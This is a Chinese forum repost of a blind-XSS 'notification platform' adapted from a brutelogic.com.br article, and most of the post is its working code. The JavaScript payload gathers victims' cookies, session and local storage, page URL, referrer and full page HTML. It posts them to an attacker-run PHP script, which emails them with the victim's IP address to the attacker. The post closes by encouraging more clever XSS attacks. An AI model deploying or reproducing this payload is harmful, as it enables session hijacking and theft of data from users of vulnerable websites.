【转】来自BruteXSS的XSS平台简易版
发布于 7 个月前 阅读权限 无需登录 作者 backcover7 8985 次浏览 来自 开源项目

来源:https://brutelogic.com.br/blog/blind-xss-code/ 如果使用复杂的XSS平台系统,那么需要搭建各式各样的组件,而来源文章提供了一种新型的简易的方式建立XSS即时通知平台,即利用邮件通知形式来进行XSS平台的盲注。代码如下:

var mailer = ‘<?php echo “//” . $_SERVER[“SERVER_NAME”] . $_SERVER[“REQUEST_URI”] ?>’;

var msg = ‘USER AGENT\n’ + navigator.userAgent + ‘\n\nTARGET URL\n’ + document.URL; msg += ‘\n\nREFERRER URL\n’ + document.referrer + ‘\n\nREADABLE COOKIES\n’ + document.cookie; msg += ‘\n\nSESSION STORAGE\n’ + JSON.stringify(sessionStorage) + ‘\n\nLOCAL STORAGE\n’ + JSON.stringify(localStorage); msg += ‘\n\nFULL DOCUMENT\n’ + document.documentElement.innerHTML;

var r = new XMLHttpRequest(); r.open(‘POST’, mailer, true); r.setRequestHeader(‘Content-type’, ‘application/x-www-form-urlencoded’); r.send(‘origin=’ + document.location.origin + ‘&msg=’ + encodeURIComponent(msg));

<?php

header("Access-Control-Allow-Origin: " . $_POST[“origin”]);

$origin = $_POST[“origin”]; $to = “myName@myDomain”; $subject = "XSS Blind Report for " . $origin; $ip = "Requester: " . $_SERVER[“REMOTE_ADDR”] . "\nForwarded For: ". $_SERVER[“HTTP_X_FORWARDED_FOR”]; $msg = $subject . “\n\nIP ADDRESS\n” . $ip . “\n\n” . $_POST[“msg”]; $headers = “From: report@myDomain” . “\r\n”;

if ($origin && $msg) { mail($to, $subject, $msg, $headers); }

?>

希望以此话题引出更多更奇妙的XSS攻击或其他盲注类攻击平台的精巧利用。

回到顶部